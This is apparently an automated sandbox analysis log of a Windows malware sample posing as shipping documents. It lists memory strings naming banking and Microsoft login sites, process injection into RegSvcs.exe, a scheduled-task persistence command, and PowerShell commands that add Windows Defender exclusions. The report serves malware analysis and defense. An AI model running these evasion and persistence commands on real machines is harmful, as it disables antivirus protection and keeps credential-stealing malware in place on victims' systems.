Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596141
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595339
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594957
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594815
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594688
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594529
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594422
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594176
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594047
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696494690o
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696494690f
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696494690s
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696494690o
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696494690j
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: RegSvcs.exe, 00000009.00000002.3918717496.0000000001116000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3918857090.0000000001538000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696494690s
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: tdcorV.exe, 0000000A.00000002.1525703407.0000000000C42000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696494690j
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: tdcorV.exe, 0000000A.00000002.1525703407.0000000000C42000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\H-
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696494690f
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C99548 LdrInitializeThunk, 14_2_06C99548
Enables debug privileges
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShippingDocuments240384.exe"
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tdcorV.exe"
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShippingDocuments240384.exe" Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tdcorV.exe" Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000 Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 444000 Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 446000 Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: DBD008 Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 444000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 446000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1093008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShippingDocuments240384.exe" Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tdcorV.exe" Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tdcorV" /XML "C:\Users\user\AppData\Local\Temp\tmp1FC2.tmp" Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tdcorV" /XML "C:\Users\user\AppData\Local\Temp\tmp329E.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Queries volume information: C:\Users\user\Desktop\rShippingDocuments240384.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
